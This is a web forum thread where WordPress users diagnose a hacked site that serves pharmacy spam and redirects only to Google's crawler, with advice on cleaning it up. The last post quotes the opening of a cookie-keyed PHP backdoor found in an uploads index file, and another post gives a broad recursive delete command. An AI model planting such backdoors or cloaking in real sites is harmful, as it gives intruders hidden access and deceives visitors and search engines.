Site Hacked - 301 Redirects - Looking for Help (7 posts)

  1. trivum
    Posted 6 years ago #

    My site has been hacked. (Yes, I was using an old version of WordPress.)

    One of the many problems I had was the same problem as discussed in this thread about the urls being messed up.

    I have found a number of files that were obviously a part of the hack, and I have deleted them, but my site still seems to be hacked. Google is showing my site description to be about buying viagra and cialis. My site title was showing before as being "Cialis," but I was able to recover that. Still, my site description is messed up.

    What is worse, however, is when I go to Google's webmaster tools and use the "Fetch as Googlebot" tool to see what googlebot sees, a lot of my pages are coming up as being 301 permanently redirected.

    Does anyone have suggestions for where I can look to try to find the malicious code?

    One of the files I deleted had the following in it. I'll include it here to see if provides any clues.

    Any help is appreciated.

    [removed spam links we've all seen dozens of times]

  2. trivum
    Posted 6 years ago #

    Anyone with ideas on this? Thanks.

  3. alism
    Posted 6 years ago #

    No easy fixes I'm afraid.

    Delete your wp-admin and wp-includes folders. Download a fresh copy of WordPress and re-upload them with FTP. Do the same with the files in the root directory, except the .htaccess and wp-config.php file - check those manually for alterations.

    Delete all your plugins and re-install them from fresh, newly downloaded good copies.

    Check your theme. Ideally, delete it entirely and restore from a known good backup. If you've not got a backup and have made customisations, check it manually for suspicious additions.

    See how you get on with that. You should really look at the database itself too. Few links to read if you haven't already...

  4. trivum
    Posted 6 years ago #

    Thanks for the feedback.

  5. mynameiswilson
    Posted 6 years ago #

    I started noticing a few sites I visit had these issues - and I could see them in Firefox if I had Firebug AND FirePHP (FirePHP being on is crucial). Seems that whatever this is looks at the User Agent to hide it from the casual viewer, but allow Google to pick it up to increase search engine rankings.

  6. freejoe76
    Posted 6 years ago #

    I found this on a blog I'm responsible for -- requests to the web site made from the Google user agent returned pages with title tags, titles and body text laden with Viagra and other sex-drug references.

    More than 100 hidden files had been uploaded to wp-content/uploads/js_cache/ -- these files had names that looked like .%D1BB%C5BD%10E2%888E%C77C%B96F

    Removing those files (from the shell I used rm -fr .%*) fixed the problem.

    I'm looking into how those files got there in the first place.


  7. freejoe76
    Posted 6 years ago #

    After more sleuthing, it looks like this hack was related to this file that had been created the minute that the hack occurred: ./wp-content/uploads/index.php

    That file contained this code:

    if ( md5($_COOKIE['_wp_debug']) == '85bd6d00132126add83065d3dbed6c99' ) {
    $login = ""; //Login
    $pass = "";  //Pass
    $md5_pass = ""; //If no pass then hash

Topic Closed

This topic has been closed to new replies.

About this Topic


No tags yet.